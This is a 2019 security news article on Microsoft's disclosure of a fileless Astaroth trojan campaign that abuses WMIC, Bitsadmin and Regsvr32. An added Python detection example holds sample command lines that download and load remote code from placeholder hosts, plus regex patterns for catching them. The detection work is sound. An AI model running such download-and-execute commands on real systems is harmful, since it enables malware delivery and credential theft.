9 July 2019

Microsoft warns about fileless Astaroth trojan campaign

The Microsoft Defender ATP Research Team has disclosed details about an ongoing malware campaign that is distributing the Astaroth malware using fileless and living-off-the-land techniques that make it harder for security researchers and antivirus solutions to detect ongoing attacks.

The Astaroth malware trojan, which has been active since at least 2017, is able to steal users' sensitive information like their credentials, keystrokes, and other data, without dropping any executable file on the disk or installing any software on the victim's machine. All the information is then sent to a remote attacker who can use the data to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While analysing Windows telemetry data, Andrea Lelli, a member of the Windows Defender ATP team, spotted a sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) – a legitimate tool that ships with all modern versions of Windows. Upon further investigation it became clear that the source of the suspicious activity was a campaign that aimed to run the Astaroth backdoor directly in memory.

The discovered malware campaign utilizes several fileless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that led potential victims to an LNK file.

After being double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of JavaScript code. The JavaScript code in turn downloads payloads by abusing the legitimate Bitsadmin tool.

“Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process,” explained the researcher in a blog post.
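The WMIC, Bitsadmin and Regsvr32 stages described above can be expressed as a detection over process-creation logs. The following is an added example, not code from the article or from Microsoft; the event records, URLs and paths are constructed placeholders and the `image`/`cmdline` field names are assumed.

```python
import re

# Constructed sample process-creation events (the shape a Sysmon Event ID 1
# or Windows 4688 record with command-line auditing would give). Placeholder
# URLs and paths; not taken from the article.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"http://example.invalid/v.xsl"'},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority foreground "
                r"http://example.invalid/a.bin C:\Users\Public\Libraries\a.bin"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Users\Public\Libraries\a.dll"},
    # Benign uses of the same tools, which the rules must not flag.
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic computersystem get model"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
]

# One rule per stage: (name, image pattern, command-line pattern).
CHAIN = ["wmic_format_remote", "bitsadmin_download", "regsvr32_user_writable_dll"]
RULES = [
    ("wmic_format_remote", re.compile(r"\\wmic\.exe$", re.I),
     re.compile(r"/format\S*\s*\"?(https?|ftp)://", re.I)),          # /Format pointing at a URL
    ("bitsadmin_download", re.compile(r"\\bitsadmin\.exe$", re.I),
     re.compile(r"/(transfer|download|addfile)\b.*https?://", re.I)),  # BITS job fetching a URL
    ("regsvr32_user_writable_dll", re.compile(r"\\regsvr32\.exe$", re.I),
     re.compile(r"(\\users\\|\\programdata\\|\\temp\\|%appdata%).*\.dll", re.I)),
]


def classify(event):
    """Return the names of every rule that matches a single event."""
    return [name for name, img_re, cmd_re in RULES
            if img_re.search(event["image"]) and cmd_re.search(event["cmdline"])]


def detect_chain(events):
    """Summarise which stages were seen and whether the full
    WMIC -> Bitsadmin -> Regsvr32 sequence occurred in order."""
    stages = [name for ev in events for name in classify(ev)]
    it = iter(stages)                                     # ordered subsequence check
    full = all(any(seen == step for seen in it) for step in CHAIN)
    return {"stages": sorted(set(stages)), "full_chain": full}
```

Any single stage firing is worth triage on its own; the ordered chain is the higher-confidence signal.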

What this means is that the malware doesn’t rely on any traditional methods (vulnerability exploits or trojan downloaders), instead using only legitimate system tools and commands to achieve its goal and to masquerade its activity – a technique that security experts call "living off the land". This technique allows the malware to hide from most endpoint antivirus solutions, which are based on static file analysis.

For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded, said Lelli. The researcher pointed out that:

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”
